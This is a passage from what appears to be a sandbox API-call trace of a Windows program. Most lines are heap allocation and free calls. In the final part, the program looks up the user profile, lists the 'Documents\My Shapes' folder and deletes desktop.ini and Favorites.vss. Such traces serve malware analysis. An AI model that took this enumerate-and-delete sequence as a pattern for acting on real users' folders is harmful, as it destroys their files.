wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466d90 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.817] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.818] CloseHandle (hObject=0x2cc) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x3551008 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ca8 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.818] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d28 | out: hHeap=0x25c0000) returned 1 [0264.819] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1778 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa740 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17f8 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0264.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17f8 | out: hHeap=0x25c0000) returned 1 [0264.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0264.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0264.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.819] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0264.819] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa740 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1778 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a96d8 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6be8 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d50 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b56a8 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1bc8 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3b78 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d80 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c68 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ee8 | out: hHeap=0x25c0000) returned 1 [0264.820] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c40 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6bc0 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e88 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ad8 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a30 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d68 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9de0 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6ad0 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b4870 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3a88 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac978 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1828 | out: hHeap=0x25c0000) returned 1 [0264.821] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6cb0 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6558 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2088 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f48 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ab0 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c38 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ea0 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ce0 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6af8 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1368 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.822] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2420898 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.823] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.823] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0264.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.823] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0264.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c38 [0264.824] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e58 [0264.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa110 [0264.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0264.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0264.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0264.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.824] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf440, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0264.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0264.824] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17d8 [0264.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.824] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1b8 | out: hHeap=0x25c0000) returned 1 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa110 | out: hHeap=0x25c0000) returned 1 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e10 | out: hHeap=0x25c0000) returned 1 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0264.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466e10 [0264.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xa0) returned 0x24207f0 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1198 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1198 | out: hHeap=0x25c0000) returned 1 [0264.825] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0264.825] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0264.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0264.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0264.826] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x64) returned 0x24202f0 [0264.826] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents/My Shapes", nBufferLength=0x104, lpBuffer=0x8bee20, lpFilePart=0x8bedfc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes", lpFilePart=0x8bedfc*="My Shapes") returned 0x31 [0264.826] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24202f0 | out: hHeap=0x25c0000) returned 1 [0264.826] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes")) returned 0x14 [0264.832] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\*.*", lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d7d, dwReserved1=0x4, cFileName=".", cAlternateFileName="")) returned 0xaa58a0 [0264.832] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d7d, dwReserved1=0x4, cFileName="..", cAlternateFileName="")) returned 1 [0264.832] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebf97a0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0xd8, dwReserved0=0x1d7d, dwReserved1=0x4, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0264.833] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\desktop.ini")) returned 1 [0264.834] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9e9e4460, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9e9e4460, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9e9e4460, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d7d, dwReserved1=0x4, cFileName="Favorites.vss", cAlternateFileName="FAVORI~1.VSS")) returned 1 [0264.834] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\My Shapes\\Favorites.vss" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\my shapes\\favorites.vss")) returned 1 [0264.835] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d7d, dwReserved1=0x4, cFileName="_private", cAlternateFileName="")) returned 1 [0264.835] FindNextFileW (in: hFindFile=0xaa58a0, lpFindFileData=0x8bf030 | out: lpFindFileData=0x8bf030*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x9ebad4e0, ftCreationTime.dwHighDateTime=0x1d305ee, ftLastAccessTime.dwLowDateTime=0x9ebad4e0, ftLastAccessTime.dwHighDateTime=0x1d305ee, ftLastWriteTime.dwLowDateTime=0x9ebad4e0, ftLastWriteTime.dwHighDateTime=0x1d305ee, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x1d7d, dwReserved1=0x4, cFileName="_private", cAlternateFileName="")) returned 0 [0264.835] FindClose (in: hFindFile=0xaa58a0 | out: hFindFile=0xaa58a0) returned 1 [0264.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24207f0 | out: hHeap=0x25c0000) returned 1 [0264.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17d8 | out: hHeap=0x25c0000) returned 1 [0264.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0264.835] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ab0 | out: hHeap=0x25c0000) returned 1 [0264.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9db0 | out: hHeap=0x25c0000) returned 1 [0264.836] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9db0 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ab0 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17d8 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1468 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0264.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1468 | out: hHeap=0x25c0000) returned 1 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24207f0 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1468 [0264.836] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e58 [0264.836] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa110 [0264.836] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 